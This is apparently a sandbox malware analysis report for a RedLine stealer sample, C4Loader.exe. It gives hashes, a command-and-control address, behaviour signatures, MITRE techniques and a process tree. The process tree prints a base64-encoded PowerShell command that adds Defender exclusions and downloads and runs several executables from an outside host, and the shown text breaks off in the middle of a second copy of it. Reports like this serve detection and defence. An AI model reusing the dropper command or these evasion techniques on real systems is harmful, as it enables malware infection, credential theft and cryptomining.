redline | dcdf6845df1e1aed6f335dd6f2a3ff7351984522235937e5c4a1c746c7fe4371

Analysis

max time kernel
125s
max time network
127s
platform
windows7_x64
resource
win7-20220901-en
resource tags

arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system
submitted
16-11-2022 14:04

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

C4Loader.exe
Size

451KB
MD5

6ebfb1bc4aef4886d38fbb5170371b58
SHA1

084b3f0910c3fcf8a4cfeed2428ff786b94f3759
SHA256

dcdf6845df1e1aed6f335dd6f2a3ff7351984522235937e5c4a1c746c7fe4371
SHA512

c041161a616de51ebe98e01c93e710ccf177a52f998376808b56e6e624c40729377298335fde0092b2472af3acd8e9b417701f23c4afc24053e837f17346300a
SSDEEP

6144:aO6T/AiMhIbmjE1RrkHDS83avj7hPBV8MvqndNrhuCJm/rGlnrxZOc:cT/yIKjE1RrkHDS83aHTehuCJwGlnXJ

Score

10^/10

redline xmrig 1 evasion infostealer miner spyware upx

Malware Config

Extracted

Family

redline

Botnet

107.182.129.73:21733

Attributes

auth_value
3a5bb0917495b4312d052a0b8977d2bb

Signatures

Modifies security service 2 TTPs 2 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security	reg.exe

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 8 IoCs

Processes:

resource	yara_rule
behavioral1/memory/624-80-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline
behavioral1/memory/624-85-0x000000000041ADAE-mapping.dmp	family_redline
behavioral1/memory/624-86-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline
behavioral1/memory/624-87-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline
behavioral1/memory/1492-179-0x00000000000DADAE-mapping.dmp	family_redline
behavioral1/memory/1492-174-0x00000000000C0000-0x00000000000E0000-memory.dmp	family_redline
behavioral1/memory/1492-180-0x00000000000C0000-0x00000000000E0000-memory.dmp	family_redline
behavioral1/memory/1492-181-0x00000000000C0000-0x00000000000E0000-memory.dmp	family_redline

Suspicious use of NtCreateUserProcessOtherParentProcess 17 IoCs

Processes:

SmartDefRun.exeSmartDefRun.exeSmartScreenQC.exedialer.exe

description	pid	process	target process
PID 436 created 1388	436	SmartDefRun.exe	Explorer.EXE
PID 436 created 1388	436	SmartDefRun.exe	Explorer.EXE
PID 436 created 1388	436	SmartDefRun.exe	Explorer.EXE
PID 436 created 1388	436	SmartDefRun.exe	Explorer.EXE
PID 436 created 1388	436	SmartDefRun.exe	Explorer.EXE
PID 660 created 1388	660	SmartDefRun.exe	Explorer.EXE
PID 660 created 1388	660	SmartDefRun.exe	Explorer.EXE
PID 660 created 1388	660	SmartDefRun.exe	Explorer.EXE
PID 660 created 1388	660	SmartDefRun.exe	Explorer.EXE
PID 660 created 1388	660	SmartDefRun.exe	Explorer.EXE
PID 572 created 1388	572	SmartScreenQC.exe	Explorer.EXE
PID 572 created 1388	572	SmartScreenQC.exe	Explorer.EXE
PID 572 created 1388	572	SmartScreenQC.exe	Explorer.EXE
PID 572 created 1388	572	SmartScreenQC.exe	Explorer.EXE
PID 1964 created 1388	1964	dialer.exe	Explorer.EXE
PID 572 created 1388	572	SmartScreenQC.exe	Explorer.EXE
PID 572 created 1388	572	SmartScreenQC.exe	Explorer.EXE

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 1 IoCs

miner

Processes:

resource	yara_rule
behavioral1/memory/924-268-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig

Blocklisted process makes network request 2 IoCs

Processes:

powershell.exepowershell.exe

flow pid process

4 1520 powershell.exe
9 2032 powershell.exe
Downloads MZ/PE file

flow	pid	process
4	1520	powershell.exe
9	2032	powershell.exe

Drops file in Drivers directory 3 IoCs

Processes:

SmartDefRun.exeSmartScreenQC.exeSmartDefRun.exe

description	ioc	process
File created	C:\Windows\System32\drivers\etc\hosts	SmartDefRun.exe
File created	C:\Windows\System32\drivers\etc\hosts	SmartScreenQC.exe
File created	C:\Windows\System32\drivers\etc\hosts	SmartDefRun.exe

Executes dropped EXE 7 IoCs

Processes:

new2.exeSysApp.exeSmartDefRun.exeSmartScreenQC.exenew2.exeSysApp.exeSmartDefRun.exe

pid process

1676 new2.exe
308 SysApp.exe
436 SmartDefRun.exe
572 SmartScreenQC.exe
240 new2.exe
1956 SysApp.exe
660 SmartDefRun.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

pid	process
1676	new2.exe
308	SysApp.exe
436	SmartDefRun.exe
572	SmartScreenQC.exe
240	new2.exe
1956	SysApp.exe
660	SmartDefRun.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral1/memory/924-268-0x0000000140000000-0x00000001407F4000-memory.dmp	upx

Loads dropped DLL 11 IoCs

Processes:

powershell.exetaskeng.exepowershell.exe

pid	process
1520	powershell.exe
1520	powershell.exe
1520	powershell.exe
1520	powershell.exe
1520	powershell.exe
548	taskeng.exe
2032	powershell.exe
2032	powershell.exe
2032	powershell.exe
2032	powershell.exe
2032	powershell.exe

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Drops file in System32 directory 9 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.EXEpowershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 8 IoCs

Processes:

C4Loader.exenew2.exeSmartDefRun.exeC4Loader.exenew2.exeSmartDefRun.exeSmartScreenQC.exe

description	pid	process	target process
PID 1128 set thread context of 888	1128	C4Loader.exe	vbc.exe
PID 1676 set thread context of 624	1676	new2.exe	vbc.exe
PID 436 set thread context of 1884	436	SmartDefRun.exe	dialer.exe
PID 1800 set thread context of 616	1800	C4Loader.exe	vbc.exe
PID 240 set thread context of 1492	240	new2.exe	vbc.exe
PID 660 set thread context of 956	660	SmartDefRun.exe	dialer.exe
PID 572 set thread context of 1964	572	SmartScreenQC.exe	dialer.exe
PID 572 set thread context of 924	572	SmartScreenQC.exe	dialer.exe

Drops file in Program Files directory 5 IoCs

Processes:

SmartDefRun.exeSmartDefRun.execmd.exeSmartScreenQC.execmd.exe

description	ioc	process
File created	C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe	SmartDefRun.exe
File created	C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe	SmartDefRun.exe
File created	C:\Program Files\Google\Libs\g.log	cmd.exe
File created	C:\Program Files\Google\Libs\WR64.sys	SmartScreenQC.exe
File created	C:\Program Files\Google\Libs\g.log	cmd.exe

Launches sc.exe 15 IoCs

Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid	process
2032	sc.exe
1616	sc.exe
2008	sc.exe
1568	sc.exe
2032	sc.exe
948	sc.exe
484	sc.exe
1856	sc.exe
1596	sc.exe
760	sc.exe
1972	sc.exe
1712	sc.exe
1760	sc.exe
1396	sc.exe
1940	sc.exe

Program crash 3 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exe

pid pid_target process target process

1316 1128 WerFault.exe C4Loader.exe
1980 1800 WerFault.exe C4Loader.exe
1188 1832 WerFault.exe C4Loader.exe
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

1564 schtasks.exe
1928 schtasks.exe
1532 schtasks.exe
1440 schtasks.exe

pid	pid_target	process	target process
1316	1128	WerFault.exe	C4Loader.exe
1980	1800	WerFault.exe	C4Loader.exe
1188	1832	WerFault.exe	C4Loader.exe

pid	process
1564	schtasks.exe
1928	schtasks.exe
1532	schtasks.exe
1440	schtasks.exe

Modifies data under HKEY_USERS 7 IoCs

Processes:

dialer.exepowershell.EXEWMIC.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT\CRLs	dialer.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT\CTLs	dialer.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.EXE
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 00b8b896c4f9d801	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WMIC.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT	dialer.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT\Certificates	dialer.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exeSmartDefRun.exeSysApp.exepowershell.exepowershell.exepowershell.exepowershell.exevbc.exeSmartDefRun.exeSysApp.exepowershell.exepowershell.exepowershell.exevbc.exeSmartScreenQC.exepowershell.exepowershell.EXEpowershell.exe

pid	process
1520	powershell.exe
1520	powershell.exe
1520	powershell.exe
1520	powershell.exe
1520	powershell.exe
1520	powershell.exe
1520	powershell.exe
1520	powershell.exe
436	SmartDefRun.exe
436	SmartDefRun.exe
308	SysApp.exe
308	SysApp.exe
308	SysApp.exe
308	SysApp.exe
308	SysApp.exe
956	powershell.exe
436	SmartDefRun.exe
436	SmartDefRun.exe
436	SmartDefRun.exe
436	SmartDefRun.exe
1516	powershell.exe
436	SmartDefRun.exe
436	SmartDefRun.exe
436	SmartDefRun.exe
436	SmartDefRun.exe
692	powershell.exe
2032	powershell.exe
624	vbc.exe
2032	powershell.exe
2032	powershell.exe
2032	powershell.exe
2032	powershell.exe
2032	powershell.exe
2032	powershell.exe
2032	powershell.exe
2032	powershell.exe
660	SmartDefRun.exe
660	SmartDefRun.exe
1956	SysApp.exe
1956	SysApp.exe
1956	SysApp.exe
1956	SysApp.exe
1956	SysApp.exe
1128	powershell.exe
660	SmartDefRun.exe
660	SmartDefRun.exe
660	SmartDefRun.exe
660	SmartDefRun.exe
2036	powershell.exe
660	SmartDefRun.exe
660	SmartDefRun.exe
660	SmartDefRun.exe
660	SmartDefRun.exe
1732	powershell.exe
1492	vbc.exe
572	SmartScreenQC.exe
572	SmartScreenQC.exe
856	powershell.exe
1264	powershell.EXE
572	SmartScreenQC.exe
572	SmartScreenQC.exe
572	SmartScreenQC.exe
572	SmartScreenQC.exe
816	powershell.exe

Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

464

pid	process
464

Suspicious use of AdjustPrivilegeToken 38 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exevbc.exepowershell.exepowershell.exepowershell.exevbc.exepowershell.exepowershell.EXEpowershell.exeWMIC.exedialer.exe

description	pid	process
Token: SeDebugPrivilege	1520	powershell.exe
Token: SeDebugPrivilege	956	powershell.exe
Token: SeDebugPrivilege	1516	powershell.exe
Token: SeDebugPrivilege	692	powershell.exe
Token: SeDebugPrivilege	2032	powershell.exe
Token: SeDebugPrivilege	624	vbc.exe
Token: SeDebugPrivilege	1128	powershell.exe
Token: SeDebugPrivilege	2036	powershell.exe
Token: SeDebugPrivilege	1732	powershell.exe
Token: SeDebugPrivilege	1492	vbc.exe
Token: SeDebugPrivilege	856	powershell.exe
Token: SeDebugPrivilege	1264	powershell.EXE
Token: SeDebugPrivilege	816	powershell.exe
Token: SeAssignPrimaryTokenPrivilege	1708	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1708	WMIC.exe
Token: SeSecurityPrivilege	1708	WMIC.exe
Token: SeTakeOwnershipPrivilege	1708	WMIC.exe
Token: SeLoadDriverPrivilege	1708	WMIC.exe
Token: SeSystemtimePrivilege	1708	WMIC.exe
Token: SeBackupPrivilege	1708	WMIC.exe
Token: SeRestorePrivilege	1708	WMIC.exe
Token: SeShutdownPrivilege	1708	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1708	WMIC.exe
Token: SeUndockPrivilege	1708	WMIC.exe
Token: SeManageVolumePrivilege	1708	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	1708	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1708	WMIC.exe
Token: SeSecurityPrivilege	1708	WMIC.exe
Token: SeTakeOwnershipPrivilege	1708	WMIC.exe
Token: SeLoadDriverPrivilege	1708	WMIC.exe
Token: SeSystemtimePrivilege	1708	WMIC.exe
Token: SeBackupPrivilege	1708	WMIC.exe
Token: SeRestorePrivilege	1708	WMIC.exe
Token: SeShutdownPrivilege	1708	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1708	WMIC.exe
Token: SeUndockPrivilege	1708	WMIC.exe
Token: SeManageVolumePrivilege	1708	WMIC.exe
Token: SeLockMemoryPrivilege	924	dialer.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

C4Loader.exevbc.exepowershell.exenew2.execmd.exe

description	pid	process	target process
PID 1128 wrote to memory of 888	1128	C4Loader.exe	vbc.exe
PID 1128 wrote to memory of 888	1128	C4Loader.exe	vbc.exe
PID 1128 wrote to memory of 888	1128	C4Loader.exe	vbc.exe
PID 1128 wrote to memory of 888	1128	C4Loader.exe	vbc.exe
PID 1128 wrote to memory of 888	1128	C4Loader.exe	vbc.exe
PID 1128 wrote to memory of 888	1128	C4Loader.exe	vbc.exe
PID 1128 wrote to memory of 1316	1128	C4Loader.exe	WerFault.exe
PID 1128 wrote to memory of 1316	1128	C4Loader.exe	WerFault.exe
PID 1128 wrote to memory of 1316	1128	C4Loader.exe	WerFault.exe
PID 1128 wrote to memory of 1316	1128	C4Loader.exe	WerFault.exe
PID 888 wrote to memory of 1520	888	vbc.exe	powershell.exe
PID 888 wrote to memory of 1520	888	vbc.exe	powershell.exe
PID 888 wrote to memory of 1520	888	vbc.exe	powershell.exe
PID 888 wrote to memory of 1520	888	vbc.exe	powershell.exe
PID 1520 wrote to memory of 1800	1520	powershell.exe	C4Loader.exe
PID 1520 wrote to memory of 1800	1520	powershell.exe	C4Loader.exe
PID 1520 wrote to memory of 1800	1520	powershell.exe	C4Loader.exe
PID 1520 wrote to memory of 1800	1520	powershell.exe	C4Loader.exe
PID 1520 wrote to memory of 1676	1520	powershell.exe	new2.exe
PID 1520 wrote to memory of 1676	1520	powershell.exe	new2.exe
PID 1520 wrote to memory of 1676	1520	powershell.exe	new2.exe
PID 1520 wrote to memory of 1676	1520	powershell.exe	new2.exe
PID 1520 wrote to memory of 308	1520	powershell.exe	SysApp.exe
PID 1520 wrote to memory of 308	1520	powershell.exe	SysApp.exe
PID 1520 wrote to memory of 308	1520	powershell.exe	SysApp.exe
PID 1520 wrote to memory of 308	1520	powershell.exe	SysApp.exe
PID 1676 wrote to memory of 624	1676	new2.exe	vbc.exe
PID 1676 wrote to memory of 624	1676	new2.exe	vbc.exe
PID 1676 wrote to memory of 624	1676	new2.exe	vbc.exe
PID 1676 wrote to memory of 624	1676	new2.exe	vbc.exe
PID 1676 wrote to memory of 624	1676	new2.exe	vbc.exe
PID 1676 wrote to memory of 624	1676	new2.exe	vbc.exe
PID 1520 wrote to memory of 436	1520	powershell.exe	SmartDefRun.exe
PID 1520 wrote to memory of 436	1520	powershell.exe	SmartDefRun.exe
PID 1520 wrote to memory of 436	1520	powershell.exe	SmartDefRun.exe
PID 1520 wrote to memory of 436	1520	powershell.exe	SmartDefRun.exe
PID 1384 wrote to memory of 1712	1384	cmd.exe	sc.exe
PID 1384 wrote to memory of 1712	1384	cmd.exe	sc.exe
PID 1384 wrote to memory of 1712	1384	cmd.exe	sc.exe
PID 1384 wrote to memory of 948	1384	cmd.exe	sc.exe
PID 1384 wrote to memory of 948	1384	cmd.exe	sc.exe
PID 1384 wrote to memory of 948	1384	cmd.exe	sc.exe
PID 1384 wrote to memory of 1940	1384	cmd.exe	sc.exe
PID 1384 wrote to memory of 1940	1384	cmd.exe	sc.exe
PID 1384 wrote to memory of 1940	1384	cmd.exe	sc.exe
PID 1384 wrote to memory of 2032	1384	cmd.exe	sc.exe
PID 1384 wrote to memory of 2032	1384	cmd.exe	sc.exe
PID 1384 wrote to memory of 2032	1384	cmd.exe	sc.exe
PID 1384 wrote to memory of 1616	1384	cmd.exe	sc.exe
PID 1384 wrote to memory of 1616	1384	cmd.exe	sc.exe
PID 1384 wrote to memory of 1616	1384	cmd.exe	sc.exe
PID 1384 wrote to memory of 2028	1384	cmd.exe	reg.exe
PID 1384 wrote to memory of 2028	1384	cmd.exe	reg.exe
PID 1384 wrote to memory of 2028	1384	cmd.exe	reg.exe
PID 1384 wrote to memory of 1000	1384	cmd.exe	reg.exe
PID 1384 wrote to memory of 1000	1384	cmd.exe	reg.exe
PID 1384 wrote to memory of 1000	1384	cmd.exe	reg.exe
PID 1384 wrote to memory of 1484	1384	cmd.exe	reg.exe
PID 1384 wrote to memory of 1484	1384	cmd.exe	reg.exe
PID 1384 wrote to memory of 1484	1384	cmd.exe	reg.exe
PID 1384 wrote to memory of 1316	1384	cmd.exe	reg.exe
PID 1384 wrote to memory of 1316	1384	cmd.exe	reg.exe
PID 1384 wrote to memory of 1316	1384	cmd.exe	reg.exe
PID 1384 wrote to memory of 1128	1384	cmd.exe	reg.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:1388

C:\Users\Admin\AppData\Local\Temp\C4Loader.exe
"C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"
2⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1128

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
3⤵
- Suspicious use of WriteProcessMemory
PID:888

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcgBwACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAagBnAHQAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAaQBiAG4AIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbQBlAHAAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBkAGQAbgBzAC4AbgBlAHQALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBDADQATABvAGEAZABlAHIALgBlAHgAZQAnACwAIAA8ACMAZQB0AHEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBlAHkAagAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBtAGcAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBDADQATABvAGEAZABlAHIALgBlAHgAZQAnACkAKQA8ACMAZQB0AHMAIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBvAG4AbgBlAGMAdAAyAG0AZQAuAGQAZABuAHMALgBuAGUAdAAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAG4AZQB3ADIALgBlAHgAZQAnACwAIAA8ACMAcgBiAHEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBoAHAAZQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBsAGUAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBuAGUAdwAyAC4AZQB4AGUAJwApACkAPAAjAGYAaAB1ACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBkAGQAbgBzAC4AbgBlAHQALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBTAHkAcwBBAHAAcAAuAGUAeABlACcALAAgADwAIwBsAHAAcQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHkAcwBjACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHcAbQB0ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAEEAcABwAC4AZQB4AGUAJwApACkAPAAjAG4AdABrACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBkAGQAbgBzAC4AbgBlAHQALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBTAG0AYQByAHQARABlAGYAUgB1AG4ALgBlAHgAZQAnACwAIAA8ACMAegB6AGwAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwB5AGgAbAAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBtAHgAcgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBTAG0AYQByAHQARABlAGYAUgB1AG4ALgBlAHgAZQAnACkAKQA8ACMAcQB4AHoAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAagB0AG0AIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHoAYwBsACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEMANABMAG8AYQBkAGUAcgAuAGUAeABlACcAKQA8ACMAaABxAGgAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAYwBnAGEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGIAawB3ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAG4AZQB3ADIALgBlAHgAZQAnACkAPAAjAGsAcgBwACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHYAbQByACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBhAHgAagAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBTAHkAcwBBAHAAcAAuAGUAeABlACcAKQA8ACMAZgBiAGIAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAdABmAG0AIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHoAaQB3ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAbQBhAHIAdABEAGUAZgBSAHUAbgAuAGUAeABlACcAKQA8ACMAYgBwAHMAIwA+AA=="
4⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1520

C:\Users\Admin\AppData\Local\Temp\C4Loader.exe
"C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"
5⤵
- Suspicious use of SetThreadContext
PID:1800

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
6⤵
PID:616

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcgBwACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAagBnAHQAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAaQBiAG4AIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbQBlAHAAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBkAGQAbgBzAC4AbgBlAHQALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBDADQATABvAGEAZABlAHIALgBlAHgAZQAnACwAIAA8ACMAZQB0AHEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBlAHkAagAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBtAGcAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBDADQATABvAGEAZABlAHIALgBlAHgAZQAnACkAKQA8ACMAZQB0AHMAIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBvAG4AbgBlAGMAdAAyAG0AZQAuAGQAZABuAHMALgBuAGUAdAAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAG4AZQB3ADIALgBlAHgAZQAnACwAIAA8ACMAcgBiAHEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBoAHAAZQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBsAGUAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBuAGUAdwAyAC4AZQB4AGUAJwApACkAPAAjAGYAaAB1ACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwA